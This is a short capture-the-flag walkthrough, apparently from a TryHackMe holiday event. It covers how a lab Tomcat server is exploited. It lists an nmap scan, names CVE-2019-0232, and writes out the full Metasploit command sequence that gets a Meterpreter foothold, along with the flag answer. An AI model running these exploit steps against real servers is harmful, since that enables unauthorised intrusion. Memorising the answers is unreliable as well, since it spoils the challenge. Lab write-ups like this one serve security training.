Ready, set, elf.

Networking - Metasploit

Video

Resources

systeminfo

Challenge

What is the version number of the web server?

nmap -Pn -sC -sV -O -v 10.10.198.75

9.0.17

What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)

CVE-2019-0232

Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.

msfconsole
search 2019-0232
use exploit/windows/http/tomcat_cgi_cmdlineargs
show targets
set TARGET 0
show options
set RHOST 10.10.198.75
set targeturi /cgi-bin/elfwhacker.bat
exploit

No answer needed

What are the contents of flag1.txt

thm{whacking_all_the_elves}

Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!

No answer needed

PreviousThe Rogue Gnome NextCoal for Christmas

Last updated 4 years ago

Was this helpful?